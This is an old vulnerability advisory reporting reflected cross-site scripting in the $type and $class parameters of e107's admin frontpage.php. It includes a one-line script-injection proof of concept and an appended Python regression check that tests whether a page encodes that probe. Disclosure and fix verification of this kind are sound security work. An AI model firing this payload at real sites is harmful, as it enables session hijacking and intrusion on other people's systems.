Code:
# exploit title: xss in e107 (logged-in users only)
# date: 12.o2.2o11
# author: lemlajt
# software : e107 
# version: 2010-08-22 / 0.7 (?)
# tested on: linux
# cve : 
#
 
PoC : 

http://localhost/www/cmsadmins/e107/e107_admin/frontpage.php
the $type and $class parameters are vulnerable to cross-site scripting.
try: '';!--<script>alert(1)</script>={()}

btw: when you see the xss, try refreshing the page through a proxy (paros or similar), and
you should see more parameters: {()} (twice), so maybe this is just some unnamed error, or
maybe we can inject code(?)


info: cat /e107/e107_files/e107.js
|	e107 website system - Javascript File.
|
|	$URL: https://e107.svn.sourceforge.net/svnroot/e107/trunk/e107_0.7/e107_files/e107.js $
|	$Revision: 11678 $
|	$Id: e107.js 11678 2010-08-22 00:43:45Z e107coders $


# regards,
# lemlajt
# *
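
Added example, not part of the original advisory and not e107 code: a Python regression check that takes the probe string from the PoC above and reports whether a response body reflects it unencoded, partially filtered, or HTML-encoded, which is how a fix for the $type and $class output can be verified. The page fragment built by render() is constructed for the example, and all function names are assumptions.

```python
import html

# Probe string quoted in the advisory.
PROBE = "'';!--<script>alert(1)</script>={()}"
TAIL = "={()}"  # marker at the end of the probe that HTML encoding leaves unchanged


def encode_for_html(value):
    """Encode a request value for HTML text or a quoted attribute."""
    return html.escape(value, quote=True)


def render(type_value, class_value, encoder=None):
    """Constructed page fragment (not e107 markup) reflecting both values."""
    enc = encoder or (lambda v: v)  # no encoder reproduces the reported flaw
    return ('<form><input name="type" value="%s">\n'
            '<input name="class" value="%s"></form>'
            % (enc(type_value), enc(class_value)))


def reflection_report(body, probe=PROBE):
    """Count raw, encoded and partially filtered reflections of the probe."""
    raw = body.count(probe)
    encoded = body.count(encode_for_html(probe))
    # Tail present but the rest of the probe altered: a filter removed
    # something instead of encoding the output.
    stray = body.count(TAIL) - raw - encoded
    if raw:
        verdict = "unencoded reflection"
    elif stray:
        verdict = "partially filtered reflection"
    elif encoded:
        verdict = "encoded reflection"
    else:
        verdict = "not reflected"
    return {"raw": raw, "encoded": encoded, "stray": stray, "verdict": verdict}


if __name__ == "__main__":
    print(reflection_report(render(PROBE, PROBE)))
    print(reflection_report(render(PROBE, PROBE, encode_for_html)))
```

A "partially filtered reflection" verdict means tag stripping is in place but output encoding is still missing, so the fix is incomplete.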